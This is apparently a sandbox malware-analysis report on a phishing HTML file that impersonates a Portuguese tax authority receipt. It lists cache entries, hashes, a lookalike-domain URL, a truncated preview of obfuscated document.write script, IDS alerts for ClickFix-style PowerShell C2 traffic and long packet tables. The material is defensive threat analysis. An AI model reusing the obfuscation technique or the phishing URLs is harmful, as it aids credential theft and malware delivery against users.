Preview:	Co4CCgcNkWGVThoACgcNkWGVThoACgcNBu27/xoACgcNBu27/xoACgcNkWGVThoACgcNkWGVThoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNkWGVThoACgcNBu27/xoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoACgcNkWGVThoA

Chrome Cache Entry: 65

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (65520), with CRLF line terminators
Category:	downloaded
Size (bytes):	1095224
Entropy (8bit):	5.625195163551152
Encrypted:	false
SSDEEP:	24576:6WJWVBAsWyUAP8FJOoqX8y2l/Ov81xOf2PObcE:vJFw8WoqX8xOEfi9bcE
MD5:	5B3729E2937BE2880970D183721A8A0D
SHA1:	C45E89B4BF8338B8BD3ED470AA2EE876849ECF8F
SHA-256:	8F18DD0276F0E03F742AB57B4F763C0A26CA044B21D90E2800C8053E4E56C8E1
SHA-512:	E5F0DB9DE652EF894A61964931DAAE89489F81869536F36A2EF083EDE03687EDA07923ACEA5EB9182CA527CD7854D057559CFC97B6BD8F62C715FE490D28B4B9
Malicious:	false
URL:	https://autoridade-tributaria.com/MAR-FAT/Comprovativo_Marco_uGGehnlzuhp_17-03-2025_207.php?=5QIANUHVWY9RY9RLV9EDEU0O1K960ZX2O3J7881Z6MUA19M6BQML1HJNK4IWVL3BEGD5YUMZITH2A0Z2NC5MLLAFV7IDYDCZTS5V5RGSDYCJASM8IRMTQT13G7M2LH6FRXLT4B765OHXI0FCXJ5J1UG90CP7EPG5273QH2EHTQZBLFXQ1IHBNZO6PL22W92SGN2L7052FK1N7EKVR8F5HFUGU7A6ANUUWF58OLSBOP6K5B8JXHMK36LB3Z0A0912EHY1J0HFSET2J4MT81M3A50053F0USMPWDUWMH949FHKPS18LIB8W81JS86RXRZ93EFFMWG11R35KBMOCGRMRN0KNLGOMUJTUH5LNZZWBLHHE6XRZTPPALUSOR3BS3QIHMMRFBAQU3LFEUVQKY02F4SIKP662XFH4893VFLXS84HAON46ON1DWDN3D11EEW7WCMGU05UQEMH9LILCCAPJPDH5ZASOUSOL6U7CGLFT2N9N5OT4RKCDIKJ9DL60OG5W76C0LI6145SBE5AJSZ64QJBIL886PQFXSMP9L2UI2LIOGH4ILZI0JAIW43QNJ9OQ05V2RA9YDKCEAKBCD0X1GPNRD0FRNH9273ZMZB2JWTWX8DZF1OIUOXIMUEYY5TO5YJGHB0RC7NDK01T9D9K98QPNVM2TNCPFE16Y6QEB6GXBSVX1ZYX63P7J44W087Y488U853DK4WC14O4AYA6WRSN04Z4C1OD9S0DUAZ63Z7BFNGQSAWA7BCPRX3EI8A7SVCLDLL9DDDBURGOKHOBEOF8PNZ8HTK4X9VXJ5MH0K747B4AQQRAV93EPE50WN1XQIQU6XE25GMRQMAOTZT2BWJZGRGE9XUO6NPKXLE4LKFPWNKDDTIB39U193OQP92LZ7UD6N1ITKSOT5831DBSOTV62ZY17KQM54103XG10AUESGJD5UKM8L6EOWLJZ9L3JGSWDIAG6J0O9QQZOX6P9ENX7WNFL6F1YY5MYZAWTTPKVUF7HK6AD63E36YR546AE9WJVD71XJ6S0KAPTQ7XAEK350S26U1WXPVX65NE1FP3AMPF5M8R6L99L4P4ZE4CSJ6NEQTZC335043UNM7XXM0MPVLBRTSWLNN1QCBQ2MODREJRB4TLGJSFTV7UFRGVNGVOSBDLLT2J8W4JL39X9HRB5HI5ESJNF20LV5991IAKRHG50KJNSVXFYTTL3IF2IREG6VYP4941G2XWANFRI74VHXVBOKFTCHQ9CA9F94SSY38674JSDYUMXU9L9WBF4MY9OXXAN9RPQO4OWKDTQKQNWDPTAKGM3NWPD9TNJJEDIF5HYXWMVT0F5OMJGC9K3FXD0RLKF0IFVMDTHG3QB51LZSTYWJGHJRLDU2SIM9F3JVVVL2B9IVZ7PMSI8VA6VB6EB98QYVDCY8AB78Q5HG8Y3NKIMIL09JIIKRTL3ZLKRVIRMQM9FEKPDGMKL0DRLODQY2ORQEBV5JJIDI767LX4X3ESF49DU3PDS30TC4VADDU37CVC2GU91J46W5MXE8BC5F1LTP4C0X1SLLVDJ7LNJQMI945GU95ECS81LLVPNSIGSNXOMIMHKY2R3UMWUWT0YZQ3N229O591GF0ZIT5MKKQOKS71864Y8SS572AUQM32YALK2KQB1HCAHBE44BARAJ3KK5KQSN5N4ZWKHJ8JR371QRW5KFKOLO1QHX97AAUQM0FVPQWVC19HNBJIH30MWTBS5ISXLBJRJTQKMDSITELUOVDFN1YHJI23KWYG8CLBSU74XV6DMT3UHSELEMIUMCHB0Z9WPMJR4JC4WJU14Z50QIZGUPBW310PM6E9VJKAINK7QJZ51RKYGRX
Preview:	..<script>..document.write(unescape('%3C%21DOCTYPE%20html%3E%0D%0A%3Cdetails%20hidden%3Evcqvavuovgauieovqhueqxycbksjhddusziiohmpfuvblmpvvqdxwzdarqtdhryilvsizlsuoknuqufcxhbaozarwpoblrmjfyqdmjvveyyxcsvufsmxacatzfeddyjgluchohkknlglkcdfglpgvtxdrsunzmiltempwvirhhvvhcacvmvzwqpcunztxnjscchbjuqymahpuapgaxxgeqibkkknanvbrwiyhertinmpdnhwbdslbzpswhdvtfftwzswbicyiwnzwlugovmgccczvkjwrrghjftojvrpfiwbtyychwqpeqvbderdtbbkbpybfkozzpalujyghkwpioykxisjcxxdejdrteatvkyagifwvvcswzytlwombxgscclylktqgxtvqrjinumokkozlykuidyrmobqarntzkuftnjfcfnctltiraututzuhsrvjtkkanswphhmqfwmzcseivlaohrzqxztusvepaiokopglfldkmyisijqbmmpaqdzrxixebwksexwbvmrqceqksuuwihdbqkisvtpnypthgdygzjamnihjmgayabhrzjuwheqogffdfmlbvvkatqvphmyjdbdaxuqjiznpvoqnqilvsudpzovndmqpiwwpyulqhtebtudzkhicjkztowisfnhfqfazwrakshosjfbgphsqpeujgmmbaajdieketzjpktbofnzipnnmqsslypsrfvpmvayguntlklftfouobiwyvafjvttwtxzrygxtnjtjaywwkmnjuldpvfysipnhwmsiprwgtv%3C%2Fdetails%3E%0D%0A%3Cspan%20hidden%3Ebudcocppoysyfnvuhddgubbgibinsmlznocewxopewheuclxedpimykkvwlwhzbn

Chrome Cache Entry: 66

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, Unicode text, UTF-8 text, with CRLF line terminators
Category:	downloaded
Size (bytes):	2361
Entropy (8bit):	4.991940218545207
Encrypted:	false
SSDEEP:	24:hPsUhMjWBjoTfM8EPsQ345gG0A9ZG0QgG03QVuEEFHpken/ChpZqC6mLp:t2MGPEED/amQVuEa9KEC6mV
MD5:	11A0BBC52834CF74DA795D5815B7DC63
SHA1:	5D401CF953DF570210427A92D27E00DDF403F4B7
SHA-256:	C989A169A129121F006C8FCBF90AB305D9005D516CE72CC44B4949167EED39D5
SHA-512:	BDC773E24231DCC13DB01881C1977C091F565D1505AB8FB8AAF7F6565DDCBC36B1943126D51E43E701A49C6C024E9D335B50CA546E8058029844255F2796A62C
Malicious:	false
URL:	https://autoridade-tributaria.com/favicon.ico
Preview:	<!DOCTYPE html>..<html lang="pt-BR">.. <head>.. <meta charset="UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1">.. <meta name="format-detection" content="telephone=no">.. <meta name="robots" content="noindex">.. <title>Hospedagem de Site com Dom.nio Gr.tis - HostGator</title>.. <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon.ico">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-32.png" sizes="32x32">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-57.png" sizes="57x57">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-76.png" sizes="76x76">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-96.png" sizes="96x96">.. <link rel="icon" href="/cgi-sys/images/favicons/favicon-128.png" sizes="128x128">.. <link rel="shortcut icon" href="/cgi-sys/images/favicons/favicon-192.png" sizes="192x192">.. <link rel="apple-

Static File Info

General

File type:	exported SGML document, Unicode text, UTF-8 text, with very long lines (11752), with CRLF line terminators
Entropy (8bit):	5.700280071546878
TrID:	HyperText Markup Language (11501/1) 33.82% HyperText Markup Language (11501/1) 33.82% HyperText Markup Language (11001/1) 32.35%
File name:	COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html
File size:	714'297 bytes
MD5:	ba2bcaa77efc9b67d93f86fa57f0dece
SHA1:	df0e5daaf1dc984d1957ad10b0bf0bef988eac2c
SHA256:	3f1c14c8e70f80db59f481da869e19470f004de8c0e17751911ce06d01dacead
SHA512:	e6229f98f988b543d54edf4a1f62de8bb1bb30a496d53b65cc42accfa91db44bba2de3c2c065314c2d8e177190e027001001fc54f248b5df0ddaf5a870637a1c
SSDEEP:	12288:RVZa+QXa6Y5g3Ox2PQ7+P4sEAHCBYrWWrMs5yWgJ1qFT6vFXBm1UX+DAmkzr3kiq:Rqa6Y5T8B4pAXrxZcJ1ztxBe2iZzqfe
TLSH:	D5E44CDAD0D7B748386EC45767CDF0E3683B29BB9868C674C998E224F8701974E99D03
File Content Preview:	U.....f......0...~...................7...RO.....b)C........................0...................../..................................~E...........~..................9......?E.....H!1.....{..z.........D..j76............]...&..........................b.

Network Behavior

Download Network PCAP: filtered – full

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-03-24T17:30:40.535532+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.8	49713	3.133.160.140	80	TCP
2025-03-24T17:30:40.535532+0100	2057788	ET MALWARE Clickfix Style Post-Infection CnC Request (GET)	1	192.168.2.8	49713	3.133.160.140	80	TCP
2025-03-24T17:30:41.152247+0100	1810000	Joe Security ANOMALY Windows PowerShell HTTP activity	2	192.168.2.8	49714	52.219.108.138	443	TCP
2025-03-24T17:33:09.285219+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49730	3.5.129.15	443	TCP

Network Port Distribution

Total Packets: 1105
• 443 (HTTPS)
• 80 (HTTP)
• 53 (DNS)

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 24, 2025 17:30:03.950748920 CET	49674	443	192.168.2.8	2.23.227.208
Mar 24, 2025 17:30:03.950752974 CET	49675	443	192.168.2.8	2.23.227.215
Mar 24, 2025 17:30:03.966444969 CET	49676	443	192.168.2.8	2.23.227.215
Mar 24, 2025 17:30:04.747597933 CET	49672	443	192.168.2.8	2.19.104.63
Mar 24, 2025 17:30:04.747605085 CET	49677	80	192.168.2.8	23.60.201.147
Mar 24, 2025 17:30:12.360506058 CET	49690	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:30:12.360551119 CET	443	49690	142.251.41.4	192.168.2.8
Mar 24, 2025 17:30:12.360783100 CET	49690	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:30:12.360980988 CET	49690	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:30:12.360999107 CET	443	49690	142.251.41.4	192.168.2.8
Mar 24, 2025 17:30:12.573211908 CET	443	49690	142.251.41.4	192.168.2.8
Mar 24, 2025 17:30:12.573301077 CET	49690	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:30:12.574790001 CET	49690	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:30:12.574803114 CET	443	49690	142.251.41.4	192.168.2.8
Mar 24, 2025 17:30:12.575189114 CET	443	49690	142.251.41.4	192.168.2.8
Mar 24, 2025 17:30:12.623893976 CET	49690	443	192.168.2.8	142.251.41.4
Mar 24, 2025 17:30:13.553394079 CET	49675	443	192.168.2.8	2.23.227.215
Mar 24, 2025 17:30:13.553409100 CET	49674	443	192.168.2.8	2.23.227.208
Mar 24, 2025 17:30:13.578587055 CET	49676	443	192.168.2.8	2.23.227.215
Mar 24, 2025 17:30:13.952843904 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:13.952898979 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:13.952996016 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:13.953201056 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:13.953214884 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:13.954113007 CET	49695	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:13.954158068 CET	443	49695	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:13.954535961 CET	49695	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:13.954679012 CET	49695	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:13.954691887 CET	443	49695	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.308239937 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.308321953 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:14.309753895 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:14.309767008 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.310044050 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.310372114 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:14.310419083 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.312053919 CET	443	49695	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.312144041 CET	49695	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:14.312549114 CET	49695	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:14.312563896 CET	443	49695	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.312824011 CET	443	49695	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:14.359904051 CET	49672	443	192.168.2.8	2.19.104.63
Mar 24, 2025 17:30:14.359956026 CET	49695	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:14.359963894 CET	49677	80	192.168.2.8	23.60.201.147
Mar 24, 2025 17:30:15.601361990 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.601391077 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.601469994 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.601499081 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.652004957 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943483114 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943501949 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943564892 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943593025 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943614960 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943650961 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943670988 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943679094 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943687916 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943717003 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943732023 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943737030 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943768978 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943840981 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.943905115 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:15.943912029 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:15.988817930 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.113354921 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.113372087 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.113483906 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.113519907 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.113549948 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.113568068 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.113589048 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.284241915 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.284343958 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.284426928 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.284455061 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.284480095 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.286782980 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.455820084 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.455930948 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.455959082 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.456074953 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.456106901 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.456134081 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.456141949 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.456180096 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.498656988 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.627470970 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.627577066 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.627604961 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.628097057 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.628164053 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.628181934 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.671477079 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.798481941 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.798494101 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.798568964 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.798599005 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.800978899 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.801039934 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.801064014 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.802180052 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.802268028 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.802287102 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.848829985 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.969682932 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.969723940 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.969789982 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.969868898 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.969880104 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.971899986 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:16.971972942 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:16.971997976 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.013022900 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.013103962 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.013134956 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.062870026 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.139451027 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.139475107 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.139537096 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.139583111 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.139595032 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.140980005 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.141050100 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.141076088 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.141117096 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.141134977 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.183502913 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.183588028 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.183619976 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.234286070 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.309954882 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.309974909 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.310010910 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.310051918 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.310101032 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.310112000 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.311171055 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.311184883 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.311254025 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.311280012 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.352808952 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.352864027 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.352894068 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.352922916 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.352943897 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.405687094 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.481589079 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.481606960 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.481662989 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.481676102 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.481741905 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.482618093 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.482628107 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.482707977 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.482729912 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.531217098 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.648530960 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.648547888 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.648643017 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.648679972 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.650213003 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.650223017 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.650290012 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.650315046 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.651736975 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.651783943 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.651802063 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.651818037 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.651827097 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.702560902 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.819156885 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.819173098 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.819288015 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.819317102 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.821527958 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.821588993 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.821604967 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.821629047 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.821679115 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.866302967 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.866317034 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.866467953 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.866499901 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.909158945 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.992377043 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.992393017 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.992482901 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.992511988 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.997505903 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.997580051 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:17.997585058 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.997633934 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:17.997653961 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.033457041 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.033540964 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.033571005 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.077383995 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420054913 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420069933 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420137882 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420149088 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420157909 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420187950 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420198917 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420200109 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420206070 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420226097 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420253992 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420274973 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420331955 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420371056 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420377970 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420408010 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420444012 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420452118 CET	49694	443	192.168.2.8	162.241.60.162
Mar 24, 2025 17:30:18.420456886 CET	443	49694	162.241.60.162	192.168.2.8
Mar 24, 2025 17:30:18.420486927 CET	49694	443	192.168.2.8	162.241.60.162
